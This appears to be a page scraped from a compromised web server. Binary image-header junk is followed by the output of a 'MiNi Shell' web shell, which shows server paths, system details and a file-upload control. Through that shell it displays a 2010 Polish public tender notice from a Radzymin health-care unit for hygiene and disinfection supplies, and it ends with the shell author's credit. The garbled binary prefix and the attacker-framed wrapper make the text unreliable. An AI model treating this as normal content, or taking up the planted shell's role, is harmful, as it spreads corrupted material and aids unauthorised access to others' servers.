JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100430/105217-N-2010.html

<p class="kh_header"><b>Radzymin: Zakup i dostawę artykułów higienicznych i środków czystości</b><br>
<b>Numer ogłoszenia: 105217 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Konstytucji 3 Maja 17, 05-250 Radzymin, woj. mazowieckie, tel. 022 7865037, faks 022 7865037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzzoz-radzymin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawę artykułów higienicznych i środków czystości.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia w zakresie zadania nr 1 dotyczy opis zadania
Lp.	Nazwa przedmiotu	Op.	Ilość
1.	Worek foliowy czarny (grubość 004 mikrona) 25 szt. w op.	200 op.	120 l
2.	Worek foliowy czarny ( grubość oo4 mikrona)  50 szt. w op.	150 op.	60 l
3	Worek foliowy czarny  (grubość 004 mikrona)  50 szt. w op.	200 op.	35 l
4	Worek niebieski  ( grubość 004 mikrona)  50 szt. w op.	50 op.	120 l
5	Worek niebieski  (grubość 004 mikrona)  50 szt.  w op.	50 op.	60 l
6	Worek niebieski (grubość 004 mikrona)  50 szt. w op.	50 op.	35 l
7	Worek czerwony (grubość 004 mikrona)  50 szt. w op.	40 op.	35 l
8	Worek czerwony (grubość 004 mikrona)  50 szt. w op. 	20 op.	120 l
9	Ochraniacze foliowe na obuwie	1000 par	
.

Przedmiot zamówienia w zakresie zadania nr 2 dotyczy opis zadania
Lp.	Nazwa przedmiotu	Op./szt	Ilość
1	Ręcznik papierowy rolka mini celuloza duża - przemysłowa  	100 op.	12 rol/op
2	Ręcznik papierowy składanka zielony 19 cm  4000szt. w kartonie	70 karto.	 
3	Papier toalet. WC do podajnika szary 21 cm 	100 op.	12 rol/op
4	Zmywak maxi gąbka  	30 op.	10 szt/op
5	Ścierki do podłogi duże	500szt	 
6	Krem do rąk glicerynowo-cytrynowy 100 mml	350szt	
7	Ścierki bezpyłowe	150 op.	3 szt/op
8	Zmywak plastikowy (druciak)	30 szt	
9	Kij do mopa	20 szt	
10	Mop zapas 	50 szt	
11	Druciak do mycia naczyń metalowy	20 szt	
12	Kubki jednorazowego użytku	2000 szt	
13	Rękawice gumowe 	10 op.	12par/op
14	Proszek do szorowania cytrynowy	20 op.	450 g
15	Pasata do szorowania 250 g.	20 op.	 
16	Proszek do prania b. białej	18 kg	3 kg/op
17	Mydło w płynie antybakteryjne	200 l	5 l
18	Mydło w płyn glicerynowe	150 l	5 l
19	Płyn do mycia podług  Ajax	30 szt	5 l
20	Płyn do mycia szyb (Clin)0,5 l	80 szt	 
21	Płyn do mycia naczyń Ludwik	110 l	5 l
22	Mleczko Izo do mycia	15 szt	 
23	Mleczko do czyszczenia  CIF	20 op.	700g. 
24	Domestos	50 l	5 l
25	Sansed płyn do WC	150 szt 	0,5 l
26	Zagęszczony płyn czyszczący dezynfekujący do toalet	50 l	 
27	Płyn do WC Palemka	50 op.	1 l
28	Zawieszka do WC koszyczek	200 szt	 
29	Odświeżacz powietrza w aerozolu Bris 300 mml	150 szt 	300 ml. 
30	Kret do czyszczenia rur 500 g.	15 szt	500 g. 
31	Odświeżacz powietrza w żelu ( stojący)  kwiatowy	100 szt	15 mml. 

32	Perfumowany koncentrat do sanitariatów  niszczący nieprzyjemny zapach .	20 l	1 l/op

33	 Środek do gruntownego czyszczenia WC gęsty, lepki, silnie kwasowy środek bez przykrego zapachu usuwający trudno rozpuszczalne osady szczególnie pod górną krawędzią muszli WC.  1 l.	30 szt	1 l. 

34	 
Sidolux PCV linoleum	50 szt	5 l.
.

Przedmiot zamówienia w zakresie zadania nr 3 dotyczy opis zadania
Lp.	Nazwa przedmiotu	poj.	 Ilość
1	Parametry dotyczące opakowań papierowo-foliowych - rękawy;
5 warstw folii nie licząc kleju, gramatura papieru 60 g/m2, wskaźniki sterylizacji parą wodną, EO i FO poza obszarem wypełnienia, termozgrzew. wielokanałowy trzyrowkowy, Na rękawie zgodnie z normą PN EN 868-5 muszą być zamieszczone  informacje : informacja o kierunku rękawa, Nr LOT, nazwa producenta, napisy w j. polskim, rozmiar rękawa. Wymagana karta charakterystyki produktu wydana przez producent, Opinia Jednostki Notyfikowanej potwierdzająca spełnienia normy PN EN 868-5		
2	Rękaw do sterylizacji   
100  x 200mm	1000 mb.
/ 200 mm szer.	 10 rolek
3	Rękaw do sterylizacji  150 x 200mm	1000 mb.
/150 mm szer.	10 rolek
4	Rękaw do sterylizacji  100 mm	500 mb. 
/100 mm szer. 	 5 rolki
	Parametry dotyczące torebek: - wskaźnik chemiczny wieloparametrowy, liniowe ułożenie wskaźnika, perforowany do kontroli sterylizacji parą wodną kl. IV, informacja o klasie testu umieszczona na teście. 		
6	Torebka do sterylizacji  
130 mm x 260 mm	500 szt.	100 op. 
7	Test paskowy do sterylizacji mokrej	600 szt	
.

Przedmiot zamówienia w zakresie zadania nr 4 dotyczy opis zadania
Pakiet Nr 4 - 
1	Preparat oparty o aktywny tlen do mycia i dezynfekcji narzędzi chirurgicznych oraz endoskopów. Nie zawierających aldehydów, chloru,QAV, oraz pochodnych benzenu i fenolu zwierających nadwęglan sodu. Koncentrat w postaci proszku. Przygotowanie roztworu poprzez dodanie preparatu do zimnej wody wodociągowej.  Wymagana pozytywna opinia Olimpus Optical .
Możliwość użycia w myjkach ultradźwiękowych.
B,F,V, Tbc (czas do1/2 h ), S (czas do 6h)
2.	Chusteczki do szybkiej dezynfekcji na bazie alkoholu przeznaczone do odkażania małych powierzchni i sprzętu medycznego. Skład substancji nasączającej: 2-propanolu i 1-propanol, bez zawartości czwartorzędowych związków amonowych, aldehydów ani kwasów. Chusteczki o przyjemnym zapachu. Spektrum działania: B, F, Tbc, V (HBV, HIV, Vaccinia, Adeno, Papowa, Rota) w czasie max. 10min.
3	Przeparat alkoholowy przeznaczony do szybkiej dezynfekcji małych powierzchni i miejsc trudno dostępnych, gotowy do uzycia. Nie zawierający aldehydów, QAV i pochodnych biguanidyny. Zawierajacy min. 3 substancje aktywne. Wymagana pozytywna opinia kliniczna IMiDz ( lub instytutu równoważnego) do stosowania na oddziałach pediatrycznych.
4	Preparat do szybkiej dezynfekcji powierzchni wrażliwych na działanie alkoholi, gotowy do użycia, nie zawierający aldehydów. Zawierający min. 3 substancje aktywne. Nanoszony na powierzchnie w postaci piany. Wymagana pozytywna opinia kliniczna. IMiDZ (lub instytutu równoważnego.  
5	Preparat chlorowy oparty o dichloroizocyjanuran sodu, w postaci tabletek, przeznaczony do dezynfekcji dużych powierzchni zmywalnych, również obciążonych materiałem organicznym. Możliwość zalewania zanieczyszczeń organicznych z jednoczesnym działaniem sporobójczym, preparat skuteczny w stosunku do Cl. diff.,  czas działania nie dłuższy niż 15 minut, wg. EN 13704 w warunkach wysokiego obciążenia białkowego z dodatkiem erytrocytów baranich (0,3%).
6	Preparat do mycia i dezynfekcji precyzyjnych narzędzi obrotowych w stomatologii. Nie zawierający aldehydów, chloru, QAV, zw. utleniający. Preparat alkaiczny (pH=12,0 - 13,0 ). Roztwór gotowy do użycia. Możliwość stosowania aktywatora. Przeznaczony do użycia w myjce ultradźwiękowej. 
7	Preparat alkoholowy do higienicznej rąk oparty o minimum 3 substancje aktywne pochodzące z trzech różnych grup chemicznych np. alkohol, QAV , kwasy, org. Mozliwość dezynfekcji skóry przed infekcjami, punkcjami. Wymagana pozytywna ocena użytkowa IMiDz (lub instytutu równoważnego) do dezynfekcji rąk personelu w oddziałach noworodków i wcześniaków. Opakowanie 500ml dostosowane do systemu dozującego typu Dermados.

8	
Preparat syntetyczny, bez zawartości mydła, do chirurgicznego i higienicznego mycia rąk, nie powodujący wysuszania skóry rąk o pH  5,0-5,5.  Oparty o APG (alkilopoliglikozydy). Kompatybilny z preparatami do dezynfekcji rąk ( Spitaderm, Skinman Soft, Skinman Complete)
9	Bezbarwny preparat o przedłużonym działaniu do dezynfekcji i odtłuszczania skóry przed operacjami, iniekcjami i punkcjami, oparty o mieszankę trzech alkoholi i nadtlenku wodoru. Niezawierający jodu i jego związków. Działający w czasie 15 s. na mikroorganizmy występujące na skórze, na bakterie (włącznie z MRSA i Tbc), grzyby, wirusy (HBV - 2min, HIV, Herpes, Rota, Adeno). Przebadany klinicznie i dermatologicznie.
10	Gotowy do użycia preparat na bazie alkoholu, nadtlenku wodoru,  chlorhexydyny a także zawierający kwas mlekowy do dezynfekcji błon śluzowych oraz graniczącej z nimi skóry. Spektrum działania: B, F, V, P.
11	Incidur
Szerokie spektrum działania obejmujące bakterie (łącznie z MRSA), Tbc, grzyby, wszystkie wirusy osłonione (łącznie z HBV, HCV, HIV), Adeno, Vaccinia, rota wirusy.
Przedstawiony Zgodnie z metodyką PZH, DGHM, (Niemieckie Towarzystwo Higieny i Mikrobiologii) , RKI ( Instytut Roberta Kocha) , Dobre właściwości myjące. Bardzo dobra tolerancja materiałowa. Zatwierdzony przez DMT ( Urząd Rejestracji Sprzętu Ochrony dróg Oddechowych ) - dezynfekcja masek oddechowych Możliwość dozowania przy pomocy automatów dozujących DG1, DG2, DG3, . 
..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 19.64.00.00-4, 33.76.00.00-5, 33.19.10.00-5, 33.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzzoz-radzymin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Radzyminie ul. Konstytucji 3 Maja 17  05-250 Radzymin  pok. 214  II p. budynek Przychodni..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.05.2010 godzina 10:30, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Radzyminie ul. Konstytucji 3 Maja 17  05-250 Radzymin  pok. 214  II p. budynek Przychodni..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 10.06.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com